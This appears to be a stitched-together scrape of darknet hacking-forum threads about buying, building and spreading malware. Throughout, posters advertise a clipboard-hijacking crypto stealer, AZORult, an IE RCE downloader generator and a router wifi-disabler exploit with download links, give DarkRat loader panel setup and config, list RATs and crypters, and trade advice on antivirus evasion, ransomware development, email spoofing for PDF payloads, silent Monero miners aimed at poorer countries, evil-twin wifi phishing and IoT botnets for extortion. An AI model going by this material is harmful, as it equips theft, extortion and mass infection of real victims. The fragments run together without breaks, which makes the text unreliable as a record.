"interested would you do a Discount ? my country has Inflation and i am shit poor <3 i^ll DM you on Jabber What is this ?It^s software(malware) that monitors victims clipboard for crypto adresses and replaces with yours.And ?When victim is infected with this malware. When he/she wants t... Interested has anyone used this crypto stealer??? does this support all cryptocurrencies or only bitcoin? the software work well guys ? Im interested What is this ?It^s software(malware) that monitors victims clipboard for crypto adresses and replaces with yours.And ?When victim is infected with this malware. When he/she wants to send crypto to somebody he copies crypto address and paste this into wallet and hit send.In the background malware is replacing copied crypto address with yours. In that case you receive the crypto to your wallet.More about software:FUD (Antivirus wont detect)Supports any crypto addreses.Price 30$. P.S Don^t ask me how to spread this software. There is many tutorials online about ""spreading"". And i^m not responsible for your blackhat actions ) Peace )My jabber creeptek@"
Devil can you share it? Who can help me with azorult? Who can help me with azorult? i have Azorult AZORult can steal credentials from the victim^s browser. Enterprise T1081 Credentials in Files AZORult can steal credentials in files belonging to common software such as Skype Telegram and Steam. sure hacktrump i will give you source code .. i was little busy but don^t worry i will give you source code as soon as possible devil can you also share it with me please? thanks devil can you share with me pls :D i have Azorult Hey devilcould you please share with me too =) i have Azorult ?q=Azorult Me please give me your telegram to contact Who can help me with azorult?
SIR i WANT TO BE A DUCK FROM SCRATCH WILL YOU TEACH ME HOW TO BE HACXX JS-DOWNLOADER IE RCE EXPLOIT 2021- Is a js code generator that generate a hidden downloader script that remotely executes exes by exploiting Internet Explorer. To use just type your remote file location and local exe. Once the code is created save as a .js or embed with a html file using the tag script.Download:http://j.gs/FSZKhttps://oxy.st/d/cQIdVirus Scan: (13/59 - For the generator) Scan: (8/59 - For the exploit use a obfuscator):- The code was made to work from a http server if executing in IE locally a permission is required.- One of the detections is JS.Trojan-Downloader.Agent.ob. Based on the virus report guaranties that it does exactly what is described. complex000 Are you able to tell us more about your program because I find no information on this one. Please.
This exploit can be inbuild with a website and once the code finds a ADB Broadband DA 2210 router on ETH1 it will disable any wifi security settings.Download:https://filecrypt.cc/Container/C006665CF4.html_Broadband_DA_2210_-_Local_Wifi_Disabler_Exploit__PT_Sapo_.rarVirus Scan:The file is in plain text
Source Code: : .zip
Download: +v+5.3.zip [clearnet]Screenshot: .png [clearnet] Lol i think darkComet is already dead Download: +v+5.3.zip [clearnet]Screenshot: .png [clearnet]
Nice post thnx Open Source RatA group of programs used to control a computer from a distance is called Remote Administration Software the program that we do it without the user??s knowledge is RAT (Remote Administration Tool or Remote Access Trojan or Remote Access Tool).On many underground forums there is a lot of offers for RAT??s. There are cheap ones and some really expensive. Some of them are sold as service with monthly/yearly subscription. In most cases they do the same. Here are some example features:Task ManagerFile ManagerStartup ManagerRemote DesktopRemote ShellRemote ExecutionSystem InformationRegistry EditorSystem Power Commands (Restart Shutdown Standby)Keylogger (Unicode Support)Reverse Proxy (SOCKS5)Password Recovery (Common Browsers and FTP Clients)Clipboard TextThe competition between providers of RAT??s solutions consists in offering a program that is undetectable by antivirus programs and updating it so that it cannot be detected in the near future. Such a solution makes our actions undetectable and that we have a better chance of success and remain undetected.Before sending an infected file make sure that it is not detectable by the victim??s antivirus program. Never use anti-virus software or a website like VirusTotal for this. Each file detected in this way will be sent to third parties making antivirus programs ready for your attack.Use websites like NoDistribute or AntiScan.Me.Test everything on virtual test environment. One machine should be server and second one client. If something doesn??t work always remember to check firewall options or port forwarding if you have live test network environment.Also do not use static IP in your client configuration. For testing it is not a problem but in let say ??production? environment use services like DuckDNS FreeDNS or No-IP.-----------------------------------------------------------------------------------------------------------------------Open source RATsOk folks here is the list of open source RATs you can use for learning purpose. I tried to choose those that are not much outdated. Happy testing and good luck. If you know any other interesting open source RATs binder or cypters please let me know I am happy to test them and add to the list.TheFatRatTheFatRat is an exploiting tool which compiles a malware with famous payload and then the compiled malware can be executed on Linux Windows Mac and Android. TheFatRat Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus. is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface Quasar is the perfect remote administration solution for you. was developed as part of an effort to build a tig-like application with very little opinionated UI logic delegating instead to the capabilities of shell commands like git log with its ??pretty and ??graph options. Shell commands are executed and the output is captured and displayed in pagers. Configurable annotators parse through the output adding annotations that can be acted upon to run other shell commands. yet powerful RAT for Windows machines. This project is simple and easy to understand It should give you a general knowledge about dotNET malwares and how it behaves. is an HTTP-based RAT that allows you to remotely control devices directly from your browser. Remote Administration Tool for Linux.9hCrypthCrypt is an open-source C++ Crypter. Stub coded in Visual Studio. Builder coded in Qt. and CrypterStandalone binder and crypter example.i hope you like this information  you can use this tools for testing purpose .just search it you will find many better stuff / Feel free to ask qustionsAfter good response adding more tools hope you will like itPE-UnionPEunion bundles multiple executables (or any other file type) into a single file. Each file can be configured individually to be compressed encrypted etc. In addition an URL can be provided for a download to be executed. Remote Administration Tool .A lot of people had to go for Android also for personal usage I know that this is outdated.But if u will buying malware from market  you can practice here first you can use this on emulator :D Based Remote Administrator Tool. Telegram Desktop Session Hijacker well i find some Fun you can try this haha # telegram lovers RAtBasic Multiplatform (Android phones + Windows PC) Remote Administration Tool.This is my first attempt to learn xamarin.android. The project is experimental and may have errors. is a RAT (Remote Administrator Trojan) Generator for Windows/Linux systems written in Python 3.=VanillaRat is an advanced remote administration tool coded in C#. VanillaRat uses the Telepathy TCP networking library dnlib module reading and writing library and Costura. Fody dll embedding library.
"password not work dude Darkrat is designed as a HTTP loader it is coded in C++ with no dependency the Current bot is design for the Windows API this means DarkRat has no Cross Platform Support.Getting Started    Connect to your Server via SSH    Install Apache2 PHP7.x MYSQL (MariaDB Server in Ubuntu 18) and PHPMYADMIN    Enable .htaccess<Directory /var/www/html>Options FollowSymLinksAllowOverride allRequire all granted</Directory>Unpack the Panel.zipUpload Files to the root of your www (By Default /var/www/html/)on a new Installation delete the index.htmlGive www Write/Read/Execute permission on all uploaded filesopen your domain oder serverip / Now you see the install pageFlowing the Setup and install the Panel or install it Manual by import the sqlby default enter username: admin password: adminConfig Example<?php$pdo = new PDO(^mysql:host=localhostdbname=darkrat^ ^username^ ^password^)Build a Bot    Create a License file named ""darkrat.lic"" and enter your License Key.    Create a file named ""config.json"" and enter your Gate SettingsShortnames:    ek = Encryption Key (Lenght 32)    pu = Pastebin URL OR Direct Encrypted URL{""pu"": ""keRwrh9WFcNrWnCLM96VuBRRMCYg/UPgRTb09A==""}    mux = A Random Mutex    sup = Startup true/false    ri = Request Interval in secounds    pre = Running Persistence true/false    st = Spread Tag    ua = User Agent for Post Requests    pn = Some Example for DarkRat DevelopersFull Config Example{""ek"": ""randomkey""""pu"": """"""mux"": ""3mCUq1z""""sup"": ""false""""ri"": ""5""""pre"": ""false""""st"": ""main""""ua"": ""SUq1rx""""pn"": { ""FOO"":""BAR"" }}    Open the builder.exe and enter your username    Select create from Config File if you created one if not select create from Terminal.    Finished. spider.exe is created Backtest your payload on a VM.Panel    Template System based on Smarty    Dynamic URL Routing    Multi User Support    Plugin System    Statistics of Bots & online rates    Advanced Bot Informations    Task Tracking    Task Geo Targeting System    Task Software Targeting System (for .net software)Bot 2.1.3    Running Persistence    Startup Persistence    Installed hidden on the FileSystem    Download & Execute    Update    Uninstall    Custom DLL Loading    Direct Connect or RAW forwarder (Like pastebin/gist also supported own plain/raw sites)Included Plugins    Botshop with autobuy Bitcoin API    Alpha version of a DDOS    HVNC    Stealer    BackConnecthttps://mega.nz/file/H7hiXaZY#BsslsFSSnJtpiDWUkdShly14wVvVBzWWR7-2RznizlEPass:passwd Im a noob in the space eagor to learn.What is this used for?"
This stealer SHOULD NOT be used as a primary botnet as there are many flaws and vulnerabilities within its code I^d advise looking into another alternative. Please run within a VM/Sandboxed environment for utmost safety.Download _Stealer_zip
1) Create shell code2) Inject code into processes3) Hide processes files directories and registry entries4) Keep a rootkit in a system5) Create a backdoor6) Create an invisible keylogger and remote console7) Make a screenshot8) Create undetectable applications9) Deceive Anti-Virus applications10) Use anti-emulation techniques11) Bypass a firewall12) Create a rootkit detector13) Protect against rootkitsDownload = _zipPassword = HackingCoding@#
" Hi I^ve been using malicious macros on excel word powerpoint... files over many years now as a main method of delivering my payloads.Although yesterday when I was creating a new one the method I always used was getting flagged. Confused I started running some tests...For example all of these techniques are now getting flagged:  now seems that ANY attempt of creating a shell object on VBS instantly gets flagged by windows defender. This used to be bypassed by using an ""external"" program to create such shell i.e: Outlook. By disabling such feature Microsoft has finally rendered any attempt at macro-creation almost completely useless.I^m desperate to know if I^m the only one experiencing this issue. If not has anyone else found a workaround? [removed] never used macros before. but the best option to avoid antivirus is change names of functions maybe change some functions themselfs then obfuscate them til high fuckin heavin. windows has a hard time flagging obfuscated code (depends on the quality of code/obfuscation though)hope that helps."
Not all ransomware but this is a good repo of live malware to learn from: [clearnet site] well I^m not fishing anyone for anything i was just inviting him for a talk about mal dev.not selling anything so you should stop fucking around. I have come across several people trying talk with telegram or jabber or what not. i did not get it since we can dm here. for sure fishy. Just another LE affiliated nigga fishing for retards. DM me i^m into the same journey maybe we can help each othertelegram @crispynallajabber :- odddkidout@jabber.today There are open source rw POCs on github that you can use as models to analyze. vulnersCom has a repo on Petya / notPetya. tarcisio-marinho has one too I think maybe modeled on WannnaCry. graniet has one inspired by Mr Robot. Others on github too. Maybe unrelated to the thread if you^re interested in coding one to use it by yourself you could take a look at my thread on this subdread.I have coded one in C++ from scratch list of features is available and it will be released in ~1.5 weeks once I have sufficient rights to open my subdread. If you still want to code one by scratch understand that it will be VERY complex to do correctly you can screw up in so many ways and believe me I^m proficient in CS and it still took me months to properly implement everything and test it. I have a lot of time on my hands at the moment and I want to use that time to learn everything about creating ransomware. I^ve been hard pressed to find any resources online that talk about the creation of ransomware. The closest I^ve gotten was learning WinAPI. Are there any resources tools tips advice or anything to point me in the right direction? I don^t want to make a half-assed malware I want to really take this serious and dedicate time to this Yeah sure if you would just want to talk you would do it on here. But right now you^re looking fucking fishy. lol stop using your useless brain Youre the fishy one im pretty sure others think this way too and youre the one who should stop using your useless brain because the ways u want to communicate are a major opsec fail (telegram). It shows that you know jack shit. I^d advise go on the forums on these leak sites you can learn from others what type of architecture implemented tactics behind deployment among many other things /post/fa503648825a131481a3
"I was thinking of using multiple different emails for the sending to mitigate that - 15 from email A 15 from B 15 from C. Have A B and C send some emails to each other and some backend emails I^d operate that can be ""validated"" to try and keep the score on the right side to avoid spam filters.Any suggested scripts you^d suggest looking at? Even attempting to search on duckduck has me seeing a bunch of articles on how it works in layman^s terms but nothing of the usable technical aspects I can read through. Most email providers such as gmail will block your email address and flag it as spam if you send more that a specific amountmy advice is target individuals instead of mass spoofingif your eager to to it anyway there are scripts available on reddit and github assuming you wrote the pdf malware you already know how to run them I^m not entirely sure this belongs here but couldn^t determine where else it might go.I am trying to learn how to spoof emails so I can use it as a means of spreading a botnet out using infected PDFs that will detect and create an exception for the JS to install the intended programs for the botnet. I^ve tried to find resources on doing this on the Clearnet but couldn^t find anything and I couldn^t really find anything on Dread. I am terrible at trying to use the search function on Dread so that may be why I haven^t found anything that might be there already.Can anyone point me in the direction of a good guide? Or give me tips on doing this? I already have a program partially written for spamming the emails necessary out. I just need to write the setup for the Spoof so I can get the intended payloads out. glad to help. Thank you for the service provider suggestions. I^ve checked them over a bit and plan to look at them more in depth. Might use both with different instances of the program hitting two separate small lists. The Git links were just mass emailers which I^d already written but they did end up causing me to realize where I was going wrong in my thinking. I don^t need a separate program from what I^ve already written. I was just treating the variables improperly.For anyone else reading this in the future either too sleep deprived drunk high or just entering into this with very little knowledge:message[""From""] = sender.........with smtplib.SMTP............server.login(sender pass)In the above the sender variable is passed in to the sending function and used in the ""From"" section and for the login. I was treating it as if it were an email program like Thunderbird or Outlook. I don^t need to care about that since it^s just logging in using those credentials but the From line can be written in the code and made to be anything. The Metadata will have replies go to the email even if I^m not expecting any replies I don^t want bounce backs that may create an issue and they^ll still see it as example@ rather than fake@. Yes that might workcheck out sendinblue Moosend as service providersand the scripts:WARNING CLEARNET LINKS.git.git.git"
Udemy is probably one of the better places to learn ive learned alot form their resources. send me some udemy courses bruh btw I^ve dumped some stuff on my channel on telegram.I^ll write  a guide on coding a custom obfuscator when I^m free ) @hiddenvault whats your telegram channel? finally with the help of levitron and longpig. i have developed my first malware with c2 implant.its a keylogger and executes reverse shell on the victim machinei would like to now step forward towards learning cryptography and other things for ransomware development.for the guys who are better at it please comment resources for the above mentioned goal.and for the guys who are standing where i was last month  you i cant exactly help with the software part but I can shed some light on the hardware part. for your C2 server youll obviously need to secure it now theres 2 ways to do this you can use a VPS or selfhost. VPS will obviously be linked to you and if you got a bad VPS then you could very easily get ratted out. however if you selfhost you maintain full control of the service. but there is a ton more that goes into it. youll need a beefy network im talking double firewalls a segregated VLAN the routes through tor time to learn and space to heat. id reccoment learning basic networking and how servers work after that you should be at least up to speed on how to host a C2 server. sounds like sensible advice. what im thinking is to get a server for c2 implant which will act as a proxy between me any the infected devices to stay anonymous server side i can manage now. im looking for cryptography ebooks and resources or github^s link to study ransomware development
 ive been interested in manero stealth miners for quite a while now... whats a realistic number of Pc/laptops can this be spread on and whats the most effective way to spread said trojan?my plan is to target 3rd/2nd world countries as they are not as computer literate as the west and might possibly open the linkdocsoftware.also if you know where i can acquire the stealth miner ill be happy to pay You can make a simple script file that will do all of this just copy files and set startup.XMRig - the mining tool - even has a hidden running mode and XMRig Proxy should be used because pools can ban you if they detect that you have too many computers with a low hashrate. Even if you get reported to the pool owner they won^t ban you usually if you use XMRig Proxy.No need to buy something that you can code yourself in 30 minutes max. im looking at the XMRig Proxy on Github right now.. would you suggest going with this or watching a youtube tutorial on how to write it myself.also what pool would you recommend that has a low payout so you can receive the tokens you mine faster then if they payout was at 1 full XMR token HashVault is a good pool you can set any payout also has a nice interface.There^s a website which can generate XMRig proxy config for you basically just make sure you have the port open once you run it and it will work. It^s easy to set up I^ve done it for a few people.By the way you don^t need to use config.json configuration file for XMRig miner you can just parse the arguments to the exe itself and it will work nicely. One more good thing about XMRig Proxy is that you can change coin algos without touching any client (while the algo is supported by XMRig ofc). you said their is a website that generates a proxy config.. mind sharing the address probably better ways of achieving that They^re actually quite easy to make look into XMRIG/Xmrig-proxy software. Also I don^t think it matters where you send it Windows OS and software comes pre-installed in a majority of computers/laptops so you need to focus on bypassing it. Sending it to 3rd world countries isn^t going to make it easier for you. yep bro there is a pack of monero silent miner selling on dark0de + spreading guide  cant remember the vendor  go to dark0de > search > monero silent miner whats the onion dark0de market subdread /d/Dark0deReborn you can find their market adress there I was under the impression that the Monero randomX protocol required two Gb of ram for every CPU core utilized in order to reduce the possibility of hard to detect Monero mining malware.
"Thanks for the pointers. Getting strong enough equipment should not be a problem. Wi-Fi Way was a portable live Linux distro designed for that...but support for Wi-Fi chips was limited...you need a strong 1W or more + a large +dB omni & directional antena.then you need a software for BruteForce hacking using Blackcat or similar GPU + CPU passwork cracking...you need the fastest GPU & CPU if you want to finish in this life...its easy to install a keylogger fake you are a pool cleaner or something. Happy learning bro :D Hacktown^s hacking guides and null byte^s wifi hacking are your real friends.You can find hack town here: .htmlAnd you can subscribe to null byte on youtube. Security tube also have a wifi hacking mega primer I guess.Also do visit https://hide01.ir to grab  some premium pentesting courses for free :D. awesome this is exactly what I was looking to find. Cheers mate I am new to hacking but it is always something I have been interested in. I want to take the first step and figure out how to hack into password protected wifi networks. Can someone point me to a resource or a guide that would get me going on this? I have a background in tech and coding and a a confident linux user.I appreciate any and all responses Did you try 12345678? password? yeah no luck fuck :( What about ""Chewy123""? All 1337 h4xx0rz go for that. Only the most 3L1T3 You can try setting up a Fake AP (Also called as Evil twin attack) where you can phish their password out like I did with my elderly neighbor grandma I have read into this method before. Are there any good packages you recommend? A very long time ago i used to use a tool called ghostphisher or something like that not sure if it still exists. Search it up and you^ll find the best ones currently out there Awesome thanks Have a look on backtrack/cali linux distro - mainly aimed towards pen testing and as you can imagine full of goodies from that department. Few years back the so called reaver was a nice way to exploit very weak implementation of WPS  (you know that button that lets you connect without typing password) not sure if that hole got plugged but have a go as lots of routers had this hole and it was very easy to get in (my personal record 1h to get in using reaver and brute force WPS pin) Thanks for the info. I will add this to my list of things to investigate aircrack airgeddon wifite ferngoogle man I^ll look into those packages. Great I personally prefer airgeddon because it includes evil twin attacks deauth attacks to grab handshakes and decode the hash and of course WPS attackskali just added it to their repository but if your using parrot its already there there are other tools as well such as reaver and pixidust/wps but airgeddon is more user friendly if your just starting"
Sodinokibi (aka REvil) has been one of the most prolific ransomware as a service (RaaS) groups over the last couple years. The ransomware family was purported to be behind the Travelex intrusion and current reports point to an attack against Acer for a reported $50 million ransom demand. photo._2021-03-29_19.03.14_jpeg Yesand they have affiliate program with only 20 teams working infects for  themand only with russian speakers they worki have their contactsbut i doubt anyone from here would be suitable brate look dm :) evo brate sad pogledao
you build one. Building your first one will take alot of initial research. For your first build you can make an ssh crawler for common default creds of linux based consumer devices like NASes routers i.e IoT stuff with poor security. You need to think about your OPSEC thoroughly on this one because there are a metric fuckton of honeypots out there that will emulate these devices. You can write the malware in Golang and compile it for ARM cpus. you need to figure out how to strip metadata from the produced binary because Go binaries by default do leak some info about the machine they were built on. This sounds hard but isn^t as hard as you think it^ll take anywhere between a few months to over a year to have your first working build depending on how hard you pursue it. You also need to think about how you are going to structure your command and control infrastructure as well. There are alot of things to think about regarding that. Put your mind to it and you can do it. The guy who made brickerbot so he could destory the Mirai/Satori botnets went in knowing virtually nothing about any kind of hacking and within what I would say is a year learned about how ISP^s work internally and he had a massive botnet watching for Mirai/Satori infections and ready to kill those bots. Also the guy that made the first strain of Mirai was pretty much a noob too and he coded the bot in C. No problem. I think there is a sub thats called /d/ddos for DDOS stuff. What @obarun said.You have to build one whats important is building and hosting the server file then you can infect the clients in different ways Thank you for the reply. I have been meaning to make a start on getting Goland under my belt Your mention of it is an extra nudge in the that direction And yes I guess IoT devices are the way to go Thanks for your input I would like to attack a service (one of which the operators cannot go to law enforcement) and hold them to ransom In order to do this I need access to a botnet are their any ^botnets for hire^? I recommend you read up on Mirai and Brickerbot and the guy who made brickerbot ahd written a few textfiles about what he was doing. He initally pasted them to deepaste but you can find archives of them here  . You can also watch some vids on youtube about honeypots. Some people who run them have yt channels where they tell you about stuff they get infected with. It^s a good way to learn some of this stuff.
"Many ways of accomplishing this from web drive by (usually the case) or by people clicking those links on a web page that pop-up stating their computer is infected and can be disinfected by either installing a program or application then ultimately infect themselves? Basically that in a nutshell with various minor tweaks. thanks bro i will try It takes work whether it be in the form of setting up phishing emails with malicious attachments or spreading it through bittorrent networks.  You could probably spread it around some pedo ^topic links^ or something to see if any of them will click on it lol.  We were just talking about this in another thread. Check out ""how to"" hacking guides for noobs and novices I have for sale at: 3 goes into details on using Microsoft Word documents to compromise your targets. Brother can give me idea about ads base malware attack like Tech Support centers done ? can any one help me to actually i want to know how to spread malware.Any help will appreciated It really depends on who your targets are. The most effective method is to tailor your attacks to your target to entice them to either open a Word document or maintain communications with you via email. Your goal here is to social engineer the individual(s) to effectively open your malware. Malicious Word/Excel documents are excellent for this and are very effective when designed and executed properly. I^d recommend learning from malware researchers and cyber security experts after they^ve revealed how APT^s and other cyber criminals compromise their targets. You can learn all about other nation state actors cybergangs etc. and what tools they^re using and how they^re delivering them. An example for this can be found at:https://pan-unit42.github.io/playbook_viewer/?pb=oilrig Thnaks for Guide bro i will go through it. Once the computer is infected the malware should scan for USB drives plugged in or network drives mounted all of which it can copy itself to. You can then look at applications your software can manipulate such as mail software to email itself to multiple places. The main idea is to see what you can access and then spread there."
 Hey so i^m eyeing a monero miner malware product on one of the markets for around $50 the reviews look okay (all positive) but obviously theres no way to tell if its really profitable or successful. Has the usual marketing gimmicks of being undetectable by most AV and works for x64 and x86 Windows OS has customizable CPU usage etc. I^m just not sure if its going to work out realistically. I^m not expecting to make huge money of this but has i understand it its really hard to detect (especially for your average user) and gives continuous inflow of money.I was thinking of making the one-off purchase and looking for /purchasing data dumps for emails and just spamming the fuck out of as many emails as possible with phishing campaigns. It might be slow to start but I^ve got plenty of time and if i can even push out 1 phishing campaign a month (with a new email and new recipients) surely i could snag a few each time and this will just build and build? Eventually i want to be proficient enough to inject crypto mining script into web pages too to get even more exposure but that won^t be for a while.Does this sounds viable? If anyone has any tips i^d love to hear either post them or pm me particularly in regards to the spreading of the malware (phishing tips how to spam emails to many users and how to spoof you^re own email to make it look legit etc.) or just pointing me in the right direction would be great so i can research further.Thanks guys do you need javascript on? Moreso i^ve come to the conclusion that manually spreading the malware through phishing fake download links etc. is a lot easier and less risky than setting up you^re own botnet and spreading the malware through this? Is this correct? Is it still profitable to spread it manually or is it only really useful when using a botnet? I^m not an expert but i^m open to learning new things though from what i^ve heard its really difficult to set up a botnet? But i know you can purchase botnet malware is it as simple as a one-time purchase for botnet malware and as soon as you exploit a few hosts it just automatically gets larger and larger? Or are there lots of maintenance costs? Basically if there^s a method to purchase effective botnet malware source code and incorporate a silent monero miner into this code is it as simple as kick-starting the botnet and the botnet will do the rest of the work (i.e. finding vulnerable hosts and dropping the mining payload) or does ongoing manual management  of the botnet need to be performed)? What are the risks involved with running a miner botnet vs. manually  spreading miner malware? u can get a silent xmr miner on the clearnet for 15$.  u wont get the source code but its only 5$ if you want a update. just crypt it and ur done. IVe bought from him multiple times. imo most vendors who sell malware on markets just found the leaked source code somewhere and is selling it for a quick buck. your best option is to find a clearnet or dark web forum.
